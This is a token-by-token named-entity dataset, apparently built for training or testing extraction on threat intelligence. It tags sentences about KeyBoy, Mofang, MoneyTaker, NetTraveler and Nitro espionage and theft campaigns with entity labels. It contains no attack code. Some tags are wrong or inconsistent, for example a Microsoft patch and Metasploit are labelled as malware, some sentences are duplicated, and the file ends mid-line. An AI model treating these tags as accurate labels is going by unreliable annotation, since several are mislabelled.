O + +Blending O +in O +with O +legitimate B-MAL +traffic E-MAL +is O +a O +common O +tactic O +used O +by O +attackers O +to O +help O +fly O +under O +the O +radar O +. O + +Subdomains O +at O +phmail.us O +have O +been O +linked O +to O +malicious B-ACT +activity E-ACT +dating O +back O +as O +far O +as O +December B-TIME +2011 E-TIME +. O + +Based O +on O +the O +patterns O +of O +subdomain O +registration O +over O +time O +in O +DNS S-PROT +, O +TRAC S-SECTEAM +believes O +this O +is O +an O +example O +where O +the O +attackers O +registered O +their O +own O +second-level O +domain O +. O + +In O +this O +blog O +post O +we'll O +analyze O +two O +specific O +incidents O +apparently O +targeting O +victims O +in O +Vietnam S-LOC +and O +in O +India S-LOC +and O +we'll O +describe O +the O +capabilities O +of O +the O +custom O +backdoor S-MAL +being O +used O +that O +for O +convenience O +( O +and O +to O +our O +knowledge O +, O +for O +a O +lack O +of O +an O +existing O +name O +) O +we O +call O +KeyBoy S-MAL +, O +due O +to O +a O +string O +present O +in O +one O +of O +the O +samples O +. O + +We O +encountered O +the O +first O +document O +exploit S-VULNAME +called O +" O +THAM B-FILE +luan I-FILE +- I-FILE +GD I-FILE +- E-FILE +NCKH2.doc S-FILE +" O +a O +few O +days O +ago O +, O +which O +appears O +to O +be O +leveraging O +some O +vulnerabilities O +patched O +with O +MS12-060 S-MAL +. O + +This O +document O +, O +written O +in O +Vietnamese O +, O +appears O +to O +be O +reviewing O +and O +discussing O +best O +practices O +for O +teaching O +and O +researching O +scientific O +topics O +. O + +For O +the O +sake O +of O +this O +analysis O +we'll O +take O +the O +Vietnamese B-MAL +backdoor E-MAL +as O +an O +example O +; O +the O +one O +found O +in O +the O +Indian B-ACT +attack E-ACT +operates O +in O +the O +exact O +same O +ACT O +. 
O + +In O +the O +second O +set O +they O +are O +making O +use O +of O +a O +dynamic B-MAL +DNS I-MAL +service E-MAL +by O +ChangeIP +. O + +com O +. O + +The O +Tibetan B-IDTY +community E-IDTY +has O +been O +targeted O +for O +over O +a O +decade O +by O +espionage B-ACT +operations E-ACT +that O +use O +malware S-MAL +to O +infiltrate O +communications O +and O +gather O +information O +. O + +he O +Tibetan B-IDTY +community E-IDTY +has O +been O +targeted O +for O +over O +a O +decade O +by O +espionage B-ACT +operations E-ACT +that O +use O +malware S-MAL +to O +infiltrate O +communications O +and O +gather O +information O +. O + +They O +are O +often O +targeted O +simultaneously O +with O +other O +ethnic B-IDTY +minorities E-IDTY +and O +religious B-IDTY +groups E-IDTY +in O +China S-LOC +. O + +Examples O +as O +early O +as O +2008 S-TIME +document B-FILE +malware E-FILE +operations O +against O +Tibetan B-IDTY +non-governmental I-IDTY +organizations E-IDTY +( O +NGOs S-IDTY +) O +that O +also O +targeted O +Falun B-IDTY +Gong E-IDTY +and O +Uyghur B-IDTY +groups E-IDTY +. O + +More O +recently O +in O +2016 S-TIME +, O +Arbor B-SECTEAM +Networks E-SECTEAM +reported O +on O +connected O +malware O +operations O +continuing O +to O +target O +these O +same O +groups O +, O +which O +the O +Communist O +Party O +of O +China O +perceives O +as O +a O +threat O +to O +its O +power O +. O + +There O +is O +the O +exploit B-FILE +code E-FILE +and O +malware O +used O +to O +gain O +access O +to O +systems O +, O +the O +infrastructure O +that O +provides O +command O +and O +control O +to O +the O +malware O +operator O +, O +and O +the O +human O +elements O +– O +developers O +who O +create O +the O +malware O +, O +operators O +who O +deploy O +it O +, O +and O +analysts O +who O +extract O +value O +from O +the O +stolen O +information O +. 
O + +For O +example O +, O +we O +have O +observed O +frequent O +reuse O +of O +older O +( O +patched O +) O +exploits O +in O +malware O +operations O +against O +the O +Tibetan B-IDTY +community E-IDTY +. O + +These O +operations O +involved O +highly O +targeted O +email B-MAL +lures E-MAL +with O +repurposed O +content O +and O +attachments O +that O +contained O +an O +updated O +version O +of O +KeyBoy S-MAL +. O + +In O +August O +and O +October B-TIME +2016 E-TIME +we O +observed O +a O +malware B-ACT +operation E-ACT +targeting O +members O +of O +the O +Tibetan B-IDTY +Parliament E-IDTY +( O +the O +highest O +legislative O +organ O +of O +the O +Tibetan B-IDTY +government E-IDTY +in O +exile O +, O +formally O +known O +as O +Central B-IDTY +Tibetan I-IDTY +Administration E-IDTY +) O +. O + +The O +Arbor S-SECTEAM +report O +describes O +the O +ongoing O +use O +of O +these O +four O +vulnerabilities O +in O +a O +series O +of O +espionage B-ACT +campaigns E-ACT +against O +not O +only O +Tibetan B-IDTY +groups E-IDTY +, O +but O +also O +others O +related O +to O +Hong B-LOC +Kong E-LOC +, O +Taiwan S-LOC +, O +and O +Uyghur S-LOC +interests O +. O + +The O +malware O +samples O +deployed O +in O +both O +of O +these O +operations O +are O +updated O +versions O +of O +the O +KeyBoy B-MAL +backdoor E-MAL +first O +discussed O +in O +2013 S-TIME +by O +Rapid7 S-SECTEAM +. O + +This O +behavioural O +tactic O +was O +previously O +mentioned O +in O +relation O +to O +KeyBoy S-MAL +in O +a O +2013 S-TIME +blog O +post O +by O +Cisco S-SECTEAM +. O + +These O +versions O +of O +KeyBoy S-MAL +differed O +from O +the O +one O +first O +described O +by O +Rapid7 S-SECTEAM +in O +several O +ACTs O +, O +many O +of O +which O +will O +be O +described O +in O +the O +sections O +to O +follow O +. 
O + +These O +samples O +were O +contained O +in O +exploit S-VULNAME +documents O +containing O +distinct O +lure O +content O +, O +one O +having O +a O +Tibetan O +nexus O +, O +the O +other O +an O +Indian S-LOC +nexus O +. O + +We O +believe O +the O +2013 S-TIME +, O +2015 S-TIME +, O +and O +2016 S-TIME +KeyBoy B-MAL +samples E-MAL +provide O +evidence O +of O +a O +development O +effort O +focused O +on O +changing O +components O +that O +would O +be O +used O +by O +researchers O +to O +develop O +detection O +signatures O +. O + +In O +another O +modification O +, O +first O +observed O +in O +the O +most O +recent O +October S-TIME +11 O +Parliamentarian O +operation O +( O +version O +agewkassif O +) O +, O +the O +developer O +(s O +) O +of O +KeyBoy S-MAL +began O +using O +a O +string B-MAL +obfuscation I-MAL +routine E-MAL +in O +order O +to O +hide O +many O +of O +the O +critical O +values O +referenced O +within O +the O +malware O +. O + +Trend B-SECTEAM +Micro E-SECTEAM +specifically O +noted O +that O +the O +2013 S-TIME +versions O +of O +KeyBoy S-MAL +used O +the O +same O +algorithm O +for O +encoding O +their O +configuration O +files O +as O +was O +observed O +in O +the O +Operation B-ACT +Tropic I-ACT +Trooper E-ACT +malware O +. O + +This O +sample O +was O +also O +found O +to O +be O +deployed O +using O +the O +CVE-2012-0158 S-VULID +vulnerability O +. O + +The O +operation O +against O +the O +Tibetan B-IDTY +Parliamentarians E-IDTY +illustrates O +the O +continued O +use O +of O +malicious B-FILE +attachments E-FILE +in O +the O +form O +of O +documents B-MAL +bearing I-MAL +exploits E-MAL +. O + +Chances O +are O +about O +even O +, O +though O +, O +that O +Mofang S-APT +is O +a O +relevant O +threat O +actor O +to O +any O +organization O +that O +invests O +in O +Myanmar S-LOC +or O +is O +otherwise O +politically S-IDTY +involved O +. 
O + +In O +addition O +to O +the O +campaign O +in O +Myanmar S-LOC +, O +Mofang S-APT +has O +been O +observed O +to O +attack O +targets O +across O +multiple O +sectors O +( O +government S-IDTY +, O +military S-IDTY +, O +critical B-IDTY +infrastructure E-IDTY +and O +the O +automotive S-IDTY +and O +weapon B-IDTY +industries E-IDTY +) O +in O +multiple O +countries O +. O + +This O +threat O +report O +gives O +insight O +into O +some O +of O +the O +information O +that O +Fox-IT S-SECTEAM +has O +about O +a O +threat O +actor O +that O +it O +follows O +, O +called O +Mofang S-APT +. O + +The O +name O +Mofang S-APT +is O +based O +on O +the O +Mandarin O +verb O +, O +which O +means O +to O +imitate O +. O + +It O +is O +highly O +likely O +that O +the O +Mofang B-APT +group E-APT +is O +a O +group O +that O +operates O +out O +of O +China S-LOC +and O +is O +probably O +government-affiliated O +. O + +Chapter O +7 O +explains O +the O +working O +of O +Mofang O +'s O +preferred O +tools O +: O +ShimRat S-MAL +and O +SimRatReporter S-MAL +. O + +The O +Mofang B-APT +group E-APT +has O +been O +active O +in O +relation O +to O +the O +Kyaukphyu O +sez O +. O + +KeyBoy S-MAL +provides O +basic O +backdoor O +functionality O +, O +allowing O +the O +operators O +to O +select O +from O +various O +capabilities O +used O +to O +surveil O +and O +steal O +information O +from O +the O +victim O +machine O +. O + +The O +first O +attack O +started O +in O +early O +July S-TIME +with O +a O +ShimRatReporter S-FILE +payload O +. O + +Myanmar S-LOC +has O +been O +the O +target O +of O +Mofang S-APT +'s O +attacks O +for O +years O +before O +the O +campaign O +related O +to O +the O +sez O +. O + +In O +late O +September B-TIME +2015 E-TIME +Mofang S-APT +used O +the O +website O +of O +Myanmar S-LOC +'s O +national O +airline O +hosted O +at O +www.flymna.com O +for O +an O +attack O +against O +an O +organization O +in O +Myanmar S-LOC +. 
O + +In O +December B-TIME +2012 E-TIME +Mofang O +started O +a O +campaign O +against O +a O +new O +target O +, O +called O +' O +seg O +' O +for O +the O +purpose O +of O +this O +report O +. O + +From O +the O +configuration O +it O +can O +be O +determined O +that O +the O +company O +was O +running O +F-Secure B-MAL +Antivirus E-MAL +and O +Mofang S-MAL +registered O +the O +domain O +to O +not O +appear O +suspicious O +. O + +In O +September B-TIME +2015 E-TIME +Mofang S-APT +launched O +another O +attack O +. O + +A O +new O +version O +of O +ShimRat S-MAL +was O +built O +on O +the O +7th O +of O +September O +, O +uploaded O +to O +the O +server O +and O +only O +days O +later O +used O +in O +a O +new O +campaign O +. O + +MoneyTaker O +has O +primarily O +been O +targeting O +card O +processing O +systems O +, O +including O +the O +AWS O +CBR O +( O +Russian O +Interbank O +System O +) O +and O +purportedly O +SWIFT O +( O +US O +) O +. O + +Given O +the O +wide O +usage O +of O +STAR O +in O +LATAM O +, O +financial B-IDTY +institutions E-IDTY +in O +LATAM O +could O +have O +particular O +exposure O +to O +a O +potential O +interest O +from O +the O +MoneyTaker B-APT +group E-APT +. O + +In O +addition O +to O +banks S-IDTY +, O +the O +MoneyTaker B-APT +group E-APT +has O +attacked O +law B-IDTY +firms E-IDTY +and O +also O +financial O +software O +vendors O +. O + +Since O +that O +time O +, O +the O +group O +attacked O +companies O +in O +California S-LOC +, O +Utah S-LOC +, O +Oklahoma S-LOC +, O +Colorado S-LOC +, O +Illinois S-LOC +, O +Missouri S-LOC +, O +South B-LOC +Carolina E-LOC +, O +North B-LOC +Carolina E-LOC +, O +Virginia S-LOC +and O +Florida S-LOC +. 
O + +The O +first O +attack O +in O +the O +US O +that O +Group-IB S-SECTEAM +attributes O +to O +MoneyTaker O +was O +conducted O +in O +the O +spring O +of O +2016 S-TIME +: O +money O +was O +stolen O +from O +the O +bank S-IDTY +by O +gaining O +access O +to O +First O +Data O +'s O +" O +STAR O +" O +network O +operator O +portal O +. O + +The O +first O +attack O +in O +the O +US S-LOC +that O +Group-IB S-SECTEAM +attributes O +to O +this O +group O +was O +conducted O +in O +the O +spring O +of O +2016 S-TIME +: O +money O +was O +stolen O +from O +the O +bank S-IDTY +by O +gaining O +access O +to O +First O +Data O +'s O +" O +STAR O +" O +network O +operator O +portal O +. O + +In O +2017 O +, O +the O +number O +of O +MoneyTaker S-APT +'s O +attacks O +has O +remained O +the O +same O +with O +8 O +US S-LOC +banks S-IDTY +, O +1 O +law B-IDTY +firm E-IDTY +and O +1 O +bank S-IDTY +in O +Russia O +being O +targeted O +. O + +In O +2017 S-TIME +, O +the O +number O +of O +attacks O +has O +remained O +the O +same O +with O +8 O +US O +banks S-IDTY +, O +1 O +law B-IDTY +firm E-IDTY +and O +1 O +bank S-IDTY +in O +Russia S-LOC +being O +targeted O +. O + +By O +analyzing O +the O +attack O +infrastructure O +, O +Group-IB S-SECTEAM +identified O +that O +MoneyTaker B-APT +group E-APT +continuously O +exfiltrates O +internal O +banking O +documentation O +to O +learn O +about O +bank S-IDTY +operations O +in O +preparation O +for O +future O +attacks O +. O + +Group-IB S-SECTEAM +reports O +that O +MoneyTaker O +uses O +both O +borrowed O +and O +their O +own O +self-written O +tools O +. O + +Group-IB S-SECTEAM +has O +provided O +Europol O +and O +Interpol O +with O +detailed O +information O +about O +the O +MoneyTaker O +group O +for O +further O +investigative O +activities S-ACT +as O +part O +of O +our O +cooperation O +in O +fighting O +cybercrime O +. 
O + +In O +late O +September B-TIME +2015 E-TIME +Mofang O +used O +the O +website O +of O +Myanmara O +'s O +national O +airline O +hosted O +at O +www.flymna.com O +for O +an O +attack O +against O +an O +organization O +in O +Myanmar S-LOC +. O + +To O +control O +the O +full O +operation O +, O +MoneyTaker S-APT +uses O +a O +Pentest B-MAL +framework I-MAL +Server E-MAL +. O + +On O +it O +, O +MoneyTaker S-APT +install O +a O +legitimate O +tool O +for O +penetration O +testing O +– O +Metasploit S-MAL +. O + +At O +the O +end O +of O +June B-TIME +2015 E-TIME +Mofang O +started O +its O +campaign O +to O +gather O +information O +of O +a O +specific O +target O +in O +relation O +to O +the O +sezs O +: O +the O +cpg B-IDTY +Corporation E-IDTY +. O + +MoneyTaker S-APT +uses O +' O +fileless S-MAL +' O +malware O +only O +existing O +in O +RAM O +and O +is O +destroyed O +after O +reboot O +. O + +To O +ensure O +persistence O +in O +the O +system O +MoneyTaker S-APT +relies O +on O +PowerShell S-MAL +and O +VBS B-MAL +scripts E-MAL +- O +they O +are O +both O +difficult O +to O +detect O +by O +antivirus O +and O +easy O +to O +modify O +. O + +After O +successfully O +infecting O +one O +of O +the O +computers O +and O +gaining O +initial O +access O +to O +the O +system O +, O +the O +attackers O +perform O +reconnaissance O +of O +the O +local O +network O +in O +order O +to O +gain O +domain O +administrator O +privileges O +and O +eventually O +consolidate O +control O +over O +the O +network O +. O + +MUSTANG B-APT +PANDA E-APT +has O +previously O +used O +the O +observed O +microblogging O +site O +to O +host O +malicious O +PowerShell B-MAL +scripts E-MAL +and O +Microsoft B-MAL +Office I-MAL +documents E-MAL +in O +targeted B-ACT +attacks E-ACT +on O +Mongolia-focused O +NGOs S-IDTY +. 
O + +This O +newly O +observed O +activity O +uses O +a O +series O +of O +redirections O +and O +fileless O +, O +malicious O +implementations O +of O +legitimate O +tools O +to O +gain O +access O +to O +the O +targeted O +systems O +. O + +Unit B-SECTEAM +42 E-SECTEAM +recently O +identified O +a O +targeted B-ACT +attack E-ACT +against O +an O +individual O +working O +for O +the O +Foreign B-IDTY +Ministry E-IDTY +of O +Uzbekistan B-LOC +in I-LOC +China E-LOC +. O + +Since O +that O +time O +, O +MoneyTaker S-APT +attacked O +companies O +in O +California S-LOC +, O +Utah S-LOC +, O +Oklahoma S-LOC +, O +Colorado S-LOC +, O +Illinois S-LOC +, O +Missouri S-LOC +, O +South B-LOC +Carolina E-LOC +, O +North B-LOC +Carolina E-LOC +, O +Virginia S-LOC +and O +Florida S-LOC +. O + +In O +their O +Operation B-ACT +Tropic I-ACT +Trooper E-ACT +report O +, O +Trend B-SECTEAM +Micro E-SECTEAM +documented O +the O +behaviour O +and O +functionality O +of O +an O +espionage B-FILE +toolkit E-FILE +with O +several O +design O +similarities O +to O +those O +observed O +in O +the O +various O +components O +of O +KeyBoy S-MAL +. O + +Our O +analysis O +shows O +that O +actors O +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +NetTraveler B-MAL +Trojan E-MAL +. O + +Unit B-SECTEAM +42 E-SECTEAM +'s O +analysis O +shows O +that O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +NetTraveler B-MAL +Trojan E-MAL +. O + +Our O +analysis O +shows O +that O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +NetTraveler B-MAL +Trojan E-MAL +. 
O + +In O +2016 S-TIME +, O +Group-IB S-SECTEAM +identified O +10 O +attacks O +conducted O +by O +MoneyTaker O +, O +6 O +attacks O +on O +banks S-IDTY +in O +the O +US S-LOC +, O +1 O +attack O +on O +a O +US S-LOC +service B-IDTY +provider E-IDTY +, O +1 O +attack O +on O +a O +bank S-IDTY +in O +the O +UK S-LOC +and O +2 O +attacks O +on O +Russian S-LOC +banks S-IDTY +. O + +If O +KeyBoy S-MAL +is O +a O +single O +component O +of O +a O +larger O +espionage O +toolkit O +, O +the O +developers O +may O +have O +realized O +that O +this O +older O +, O +static-key O +based O +, O +configuration B-MAL +encoding I-MAL +algorithm E-MAL +was O +inadvertently O +providing O +a O +link O +between O +disparate O +components O +of O +their O +malware O +suite O +. O + +In O +2016 S-TIME +, O +Group-IB S-SECTEAM +identified O +10 O +attacks O +conducted O +by O +MoneyTaker O +; O +6 O +attacks O +on O +banks S-IDTY +in O +the O +US S-LOC +, O +1 O +attack O +on O +a O +US S-LOC +service B-IDTY +provider E-IDTY +, O +1 O +attack O +on O +a O +bank S-IDTY +in O +the O +UK S-LOC +and O +2 O +attacks O +on O +Russian S-LOC +banks S-IDTY +. O + +The O +NetTraveler B-MAL +trojan E-MAL +has O +been O +known O +to O +be O +used O +in O +targeted O +cyber B-ACT +espionage I-ACT +attacks E-ACT +for O +more O +than O +a O +decade O +by O +nation O +state O +threat O +actors O +and O +continues O +to O +be O +used O +to O +target O +its O +victims O +and O +exfiltrate O +data O +. O + +The O +exploit B-FILE +document E-FILE +carrying O +this O +alternate O +KeyBoy S-MAL +configuration O +also O +used O +a O +decoy B-FILE +document E-FILE +which O +was O +displayed O +to O +the O +user O +after O +the O +exploit S-VULNAME +launched O +. O + +Only O +one O +incident O +involving O +a O +Russian O +bank S-IDTY +was O +promptly O +identified O +and O +prevented O +that O +is O +known O +to O +Group-IB S-SECTEAM +. 
O + +This O +program O +is O +designed O +to O +capture O +keystrokes O +, O +take O +screenshots O +of O +the O +user O +'s O +desktop O +and O +get O +contents O +from O +the O +clipboard O +. O + +To O +conduct O +targeted B-ACT +attacks E-ACT +, O +MoneyTaker S-APT +use O +a O +distributed B-MAL +infrastructure E-MAL +that O +is O +difficult O +to O +track O +. O + +This O +technique O +hides O +the O +true O +C2 S-TOOL +server O +from O +researchers O +that O +do O +not O +have O +access O +to O +both O +the O +rastls.dll S-FILE +and O +Sycmentec.config B-FILE +files E-FILE +. O + +Hackers O +use O +Metasploit S-MAL +to O +conduct O +all O +these O +activities S-ACT +: O +network B-ACT +reconnaissance E-ACT +, O +search O +for O +vulnerable B-ACT +applications E-ACT +, O +exploit S-VULNAME +vulnerabilities O +, O +escalate O +systems O +privileges O +, O +and O +collect O +information O +. O + +Over O +the O +years O +they've O +used O +application O +components O +from O +Norman S-SECTEAM +, O +McAfee S-SECTEAM +and O +Norton S-SECTEAM +. O + +Recently O +, O +Falcon B-SECTEAM +Intelligence E-SECTEAM +observed O +new O +activity O +from O +MUSTANG O +PANDA O +, O +using O +a O +unique O +infection B-MAL +chain E-MAL +to O +target O +likely O +Mongolia-based O +victims O +. O + +Throughout O +the O +years O +, O +the O +Mofang O +group O +has O +compromised O +countless O +servers O +belonging O +to O +government S-IDTY +or O +other O +Myanmar O +related O +organizations O +, O +in O +order O +to O +stage O +attacks O +. O + +This O +file O +requires O +the O +target O +to O +attempt O +to O +open O +the O +.lnk B-FILE +file E-FILE +, O +which O +redirects O +the O +user O +to O +a O +Windows S-OS +Scripting O +Component O +( O +.wsc O +) O +file O +, O +hosted O +on O +an O +adversary-controlled O +microblogging O +page O +. 
O + +A O +report O +published O +by O +Kaspersky B-SECTEAM +Labs E-SECTEAM +in O +2011 S-TIME +on O +NetTraveler S-MAL +also O +mentions O +the O +C2 S-TOOL +servers O +were O +being O +hosted O +by O +Krypt O +Technolgies O +. O + +Obviously O +, O +the O +developers O +behind O +NetTraveler S-MAL +have O +taken O +steps O +to O +try O +to O +hide O +the O +malware O +'s O +configuration O +. O + +In O +this O +report O +, O +we'll O +review O +how O +the O +actors O +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +the O +NetTraveler B-MAL +Trojan E-MAL +. O + +In O +this O +report O +, O +we'll O +review O +how O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +the O +NetTraveler B-MAL +Trojan E-MAL +. O + +In O +this O +report O +, O +we'll O +review O +how O +the O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +the O +NetTraveler B-MAL +Trojan E-MAL +. O + +Upon O +successful O +exploitation O +, O +the O +attachment S-FILE +will O +install O +the O +Trojan S-MAL +known O +as O +NetTraveler S-MAL +using O +a O +DLL B-FILE +side-loading E-FILE +attack O +technique O +. O + +NetTraveler S-MAL +has O +been O +used O +to O +target O +diplomats S-IDTY +, O +embassies S-IDTY +and O +government B-IDTY +institutions E-IDTY +for O +over O +a O +decade O +, O +and O +remains O +the O +tool O +of O +choice O +by O +the O +adversaries O +behind O +these O +cyber B-ACT +espionage I-ACT +campaigns E-ACT +. O + +WildFire S-SECTEAM +correctly O +classifies O +NetTraveler S-MAL +as O +malicious O +. 
O + +The O +NetTraveler O +group O +has O +infected O +victims O +across O +multiple O +establishments O +in O +both O +the O +public O +and O +private O +sector O +including O +government B-IDTY +institutions E-IDTY +, O +embassies S-IDTY +, O +the O +oil B-IDTY +and I-IDTY +gas I-IDTY +industry E-IDTY +, O +research O +centers O +, O +military B-IDTY +contractors E-IDTY +and O +activists S-IDTY +. O + +Today O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +team O +of O +experts O +published O +a O +new O +research O +report O +about O +NetTraveler S-MAL +, O +which O +is O +a O +family O +of O +malicious O +programs O +used O +by O +APT O +actors O +to O +successfully O +compromise O +more O +than O +350 O +high-profile O +victims O +in O +40 O +countries O +. O + +According O +to O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +report O +, O +this O +threat O +actor O +has O +been O +active O +since O +as O +early O +as O +2004 O +; O +however O +, O +the O +highest O +volume O +of O +activity O +occurred O +from O +2010 B-TIME +– I-TIME +2013 E-TIME +. O + +Most O +recently O +, O +the O +NetTraveler O +group O +'s O +main O +domains O +of O +interest O +for O +cyberespionage B-ACT +activities E-ACT +include O +space B-IDTY +exploration E-IDTY +, O +nanotechnology S-IDTY +, O +energy B-IDTY +production E-IDTY +, O +nuclear B-IDTY +power E-IDTY +, O +lasers S-IDTY +, O +medicine S-IDTY +and O +communications S-IDTY +. O + +In O +addition O +, O +the O +NetTraveler B-MAL +toolkit E-MAL +was O +able O +to O +install O +additional O +info-stealing O +malware O +as O +a O +backdoor O +, O +and O +it O +could O +be O +customized O +to O +steal O +other O +types O +of O +sensitive O +information O +such O +as O +configuration O +details O +for O +an O +application O +or O +computer-aided O +design O +files O +. 
O + +During O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +analysis O +of O +NetTraveler S-MAL +, O +the O +company O +'s O +experts O +identified O +six O +victims O +that O +had O +been O +infected O +by O +both O +NetTraveler O +and O +Red O +October O +, O +which O +was O +another O +cyberespionage O +operation O +analyzed O +by O +Kaspersky B-SECTEAM +Lab E-SECTEAM +in O +January B-TIME +2013 E-TIME +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +products O +detect O +and O +neutralize O +the O +malicious O +programs O +and O +its O +variants O +used O +by O +the O +NetTraveler B-MAL +Toolkit E-MAL +, O +including O +Trojan-Spy.Win32.TravNet S-MAL +and O +Downloader.Win32.NetTraveler S-MAL +. O + +Based O +on O +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +analysis O +of O +NetTraveler O +'s O +C&C S-TOOL +data O +, O +there O +were O +a O +total O +of O +350 O +victims O +in O +40 O +countries O +across O +including O +the O +United B-LOC +States E-LOC +, O +Canada S-LOC +, O +United B-LOC +Kingdom E-LOC +, O +Russia S-LOC +, O +Chile S-LOC +, O +Morocco S-LOC +, O +Greece S-LOC +, O +Belgium S-LOC +, O +Austria S-LOC +, O +Ukraine S-LOC +, O +Lithuania S-LOC +, O +Belarus S-LOC +, O +Australia S-LOC +, O +Hong B-LOC +Kong E-LOC +, O +Japan S-LOC +, O +China S-LOC +, O +Mongolia S-LOC +, O +Iran S-LOC +, O +Turkey S-LOC +, O +India S-LOC +, O +Pakistan S-LOC +, O +South B-LOC +Korea E-LOC +, O +Thailand S-LOC +, O +Qatar S-LOC +, O +Kazakhstan S-LOC +, O +and O +Jordan S-LOC +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +products O +detect O +the O +Microsoft B-IDTY +Office E-IDTY +exploits S-VULNAME +used O +in O +the O +spear-phishing S-ACT +attacks E-ACT +, O +including O +Exploit.MSWord.CVE-2010-333 S-FILE +, O +Exploit.Win32.CVE-2012-0158 S-FILE +. 
O + +In O +this O +case O +, O +it O +was O +a O +group O +commonly O +referred O +to O +as O +" O +Nitro O +" O +, O +which O +was O +coined O +by O +Symantec S-SECTEAM +in O +its O +2011 S-TIME +whitepaper O +. O + +Historically O +, O +Nitro O +is O +known O +for O +targeted O +spear B-ACT +phishing I-ACT +campaigns E-ACT +and O +using O +Poison B-MAL +Ivy I-MAL +malware E-MAL +, O +which O +was O +not O +seen O +in O +these O +attacks O +. O + +Since O +at O +least O +2013 S-TIME +, O +Nitro O +appears O +to O +have O +somewhat O +modified O +their O +malware O +and O +delivery O +methods O +to O +include O +Spindest S-MAL +and O +legitimate B-MAL +compromised I-MAL +websites E-MAL +, O +as O +reported O +by O +Cyber B-SECTEAM +Squared I-SECTEAM +'s I-SECTEAM +TCIRT E-SECTEAM +. O + +In O +July O +, O +Nitro O +compromised O +a O +South B-LOC +Korean E-LOC +clothing O +and O +accessories O +manufacturer O +'s O +website O +to O +serve O +malware O +commonly O +referred O +to O +as O +" O +Spindest S-MAL +" O +. O +Of O +all O +the O +samples O +we've O +tied O +to O +this O +activity O +so O +far O +noted O +in O +this O +blog O +, O +this O +is O +the O +only O +one O +configured O +to O +connect O +directly O +to O +an O +IP S-PROT +address O +for O +Command O +and O +Control O +( O +C2 S-TOOL +) O +. O + +The O +next O +sample O +was O +another O +Spindest S-MAL +variant O +and O +had O +the O +same O +timestamp O +as O +the O +aforementioned O +PcClient B-MAL +sample E-MAL +. O + +As O +this O +post O +and O +previous O +cited O +research O +show O +, O +APT O +groups O +such O +as O +Nitro O +will O +continue O +to O +evolve O +their O +techniques O +within O +the O +kill O +chain O +to O +avoid O +detection O +. O + +attacks O +on O +the O +chemical B-IDTY +industry E-IDTY +are O +merely O +their O +latest O +attack O +wave O +. 
O + +The O +goal O +of O +the O +attackers O +appears O +to O +be O +to O +collect O +intellectual O +property O +such O +as O +design O +documents O +, O +formulas O +, O +and O +manufacturing O +processes O +. O + +The O +attack O +wave O +started O +in O +late O +July B-TIME +2011 E-TIME +and O +continued O +into O +midSeptember O +2011 S-TIME +. O + +The O +purpose O +of O +the O +attacks O +appears O +to O +be O +industrial O +espionage O +, O +collecting O +intellectual O +property O +for O +competitive O +advantage O +. O + +They O +then O +moved O +on O +to O +the O +motor B-IDTY +industry E-IDTY +in O +late O +May S-TIME +. O + +From O +late O +April O +to O +early O +May S-TIME +, O +the O +attackers O +focused O +on O +human O +rights O +related O +NGOs S-IDTY +. O + +Attackers O +then O +moved O +on O +to O +the O +motor B-IDTY +industry E-IDTY +in O +late O +May S-TIME +. O + +At O +this O +point O +, O +the O +current O +attack B-ACT +campaign E-ACT +against O +the O +chemical B-IDTY +industry E-IDTY +began O +. O + +The O +attackers O +first O +researched O +desired O +targets O +and O +then O +sent O +an O +email S-ACT +specifically O +to O +the O +target O +. O + +First O +, O +when O +a O +specific O +recipient O +was O +targeted O +, O +the O +mails O +often O +purported O +to O +be O +meeting O +invitations O +from O +established O +business O +partners O +. O + +While O +the O +attackers O +used O +different O +pretexts O +when O +sending O +these O +malicious B-ACT +emails S-TOOL +, O +two O +methodologies O +stood O +out O +. O + +Secondly O +, O +when O +the O +emails S-TOOL +were O +being O +sent O +to O +a O +broad O +set O +of O +recipients O +, O +the O +mails O +purported O +to O +be O +a O +necessary O +security O +update O +. O + +The O +attacks O +were O +traced O +back O +to O +a O +computer O +system O +that O +was O +a O +virtual O +private O +server O +( O +VPS S-TOOL +) O +located O +in O +the O +United B-LOC +States E-LOC +. 
O + +Attackers O +are O +sending O +malicious O +PDF S-MAL +and O +DOC B-MAL +files E-MAL +, O +which O +use O +exploits O +to O +drop O +variants O +of O +Backdoor.Sogu S-MAL +. O + +This O +particular O +threat O +was O +also O +used O +by O +hackers O +to O +compromise O +a O +Korean O +social O +network O +site O +to O +steal O +records O +of O +35 O +million O +users O +. O + +The O +Sogu O +gang O +use O +a O +custom O +developed O +threat O +– O +Backdoor.Sogu S-MAL +, O +whereas O +the O +group O +described O +in O +this O +document O +use O +an O +off O +the O +shelf O +threat O +– O +Poison B-MAL +Ivy E-MAL +. O + +The O +Sogu O +gang O +, O +in O +contrast O +, O +use O +PDF S-MAL +and O +DOC B-MAL +files E-MAL +in O +very O +tailored O +, O +targeted O +emails S-TOOL +. O + +These O +attacks O +are O +primarily O +targeting O +private B-IDTY +industry E-IDTY +in O +search O +of O +key O +intellectual O +property O +for O +competitive O +advantage O +, O +military B-IDTY +institutions E-IDTY +, O +and O +governmental B-IDTY +organizations E-IDTY +often O +in O +search O +of O +documents O +related O +to O +current O +political S-IDTY +events O +and O +human B-IDTY +rights I-IDTY +organizations E-IDTY +. O + +Nitro S-APT +'s O +campaign O +focused O +on O +the O +chemical B-IDTY +sector E-IDTY +with O +the O +goal O +of O +obtaining O +sensitive O +documents O +such O +as O +proprietary O +designs O +, O +formulas O +, O +and O +manufacturing O +processes O +. O + +This O +attack B-ACT +campaign E-ACT +focused O +on O +the O +chemical B-IDTY +sector E-IDTY +with O +the O +goal O +of O +obtaining O +sensitive O +documents O +such O +as O +proprietary O +designs O +, O +formulas O +, O +and O +manufacturing O +processes O +. O + +These O +have O +been O +highly O +active O +in O +the O +Middle B-LOC +East 